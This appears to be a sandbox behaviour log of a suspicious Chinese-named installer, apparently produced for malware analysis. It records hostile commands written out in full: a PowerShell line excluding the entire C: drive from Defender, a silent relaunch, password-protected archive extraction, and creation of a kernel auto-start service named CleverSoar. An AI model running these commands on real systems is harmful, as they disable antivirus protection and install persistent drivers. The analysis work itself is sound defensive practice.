Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7432:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1868:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3732:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3556:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5608:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1420:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7368:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1948:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3352:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7640:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2052:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7600:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2508:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6592:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3112:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8100:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4220:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1820:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6492:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7244:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03

Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe

File created: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp

Jump to behavior

Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: #U5b89#U88c5#U52a9#U624b2.0.6.exe

String found in binary or memory: /LOADINF="filename"

Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe

File read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe	Process created: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp "C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp" /SL5="$20434,7252309,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe"
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe	Process created: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp "C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp" /SL5="$30452,7252309,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe" /VERYSILENT
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe	Process created: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp "C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp" /SL5="$20434,7252309,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe	Process created: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp "C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp" /SL5="$30452,7252309,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: sppc.dll	Jump to behavior
